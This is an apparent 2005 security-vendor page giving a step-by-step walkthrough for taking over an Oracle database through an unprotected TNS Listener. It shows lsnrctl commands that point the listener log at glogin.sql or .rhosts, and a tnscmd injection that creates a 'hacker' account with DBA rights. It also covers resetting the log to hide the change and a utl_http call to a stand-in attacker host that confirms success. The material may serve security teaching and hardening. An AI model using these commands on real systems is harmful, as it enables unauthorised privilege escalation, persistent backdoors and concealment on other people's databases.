Services
Information
Company |
Example how to hack an Oracle database via an unprotected TNS Listener (7.3-9i Rel.2) Required Software:
Step 1: -- Change the name of the log_file If the TNS Listener is not protected, we can rename the TNS listener logfile. There are some possibilities for potential filenames for hackers. * .rhosts (if RSH-Service is running). We can connect to the database directly by running rlogin –l ip-address * glogin.sql (or login.sql). This file is executed every time a process or user (e.g. the DBA) starts SQL*Plus on the server * boot.ini (on Windows we can corrupt the boot.ini) Start lsnrctl and run the following command. LSNRCTL> set log_file C:\oracle\ora92\sqlplus\admin\glogin.sql Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.2.151)(PORT=1521 ))) LISTENER parameter "log_file" set to C:\oracle\ora92\sqlplus\admin\glogin.sql The command completed successfully # # Check if the listener.log points to glogin.sql by submitting a status command. # LSNRCTL> status Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=IPC)(KEY=EXTPROC))) Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.2.151)(PORT=1521 ))) STATUS of the LISTENER ------------------------ Alias LISTENER Version TNSLSNR for 32-bit Windows: Version 9.2.0.6.0 - Production Start Date 25-APR-2005 10:05:46 Uptime 0 days 0 hr. 15 min. 45 sec Trace Level off Security OFF SNMP OFF Listener Log File C:\oracle\ora92\sqlplus\admin\glogin.sql Listening Endpoints Summary... (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=uhura90201.red-database-security.com )(PORT=1521))) (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=uhura90201.red-database-security.com)(PORT=8080))(Presentation=HTTP)(Session=RAW)) (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=uhura90201.red-database-security.com)(PORT=2100))(Presentation=FTP)(Session=RAW)) Services Summary... Service "ora90201" has 1 instance(s). Instance "ora90201", status READY, has 1 handler(s) for this service... Service "ora90201XDB" has 1 instance(s). Instance "ora90201", status READY, has 1 handler(s) for this service... The command completed successfully LSNRCTL> exit Step 2: Send string to glogin.sql Now we write content into the file. The content is dependent from the used file. For the .rhosts we can send “+ +”, for the glogin we could use the following example [user@picard root]# perl tnscmd -h 192.168.2.156 -p 1521 --rawcmd "(CONNECT_DATA=(( > create user hacker identified by hacker; > grant dba to hacker; > " sending (CONNECT_DATA=(( set term off create user hacker identified by hacker; grant dba to hacker; set term on to 192.168.2.156:1521 writing 138 bytes reading .Q......"..E(DESCRIPTION=(ERR=1153)(VSNNUM=153093632)(ERROR_STACK=(ERROR=(CODE=1153)(EMFI=4)(ARGS='(CONNECT_DATA=((. create user hacker identified by hacker;.grant dba to hacker;'))(ERROR=(CODE=303)(EMFI=1)))) [user@picard root]# Step 3: Set the Logfile back to the old value Set the name of the logfile back to the old value. LSNRCTL> set log_file C:\oracle\ora92\network\log\listener.log Connection to (ADDRESS=(PROTOCOL=tcp)(PORT=1521)) LISTENER Parameter "log_file" set to C:\oracle\ora92\network\log\listener.log The command completed successfully. Step 4: Login as hacker/hacker@database Next time the DBA (or a process/job) start sqlplus he creates a database user called hacker. If you append the following command in the glogin.sql you can see in your webserver logfile if the Oracle user was created (“SELECT utl_http.request(‘http://www.evildba.com/user_hacker_created’) from dual;”) References © 2005 by Red-Database-Security GmbH - last update 02-nov-2005 |
Hardening TNS-Listener
|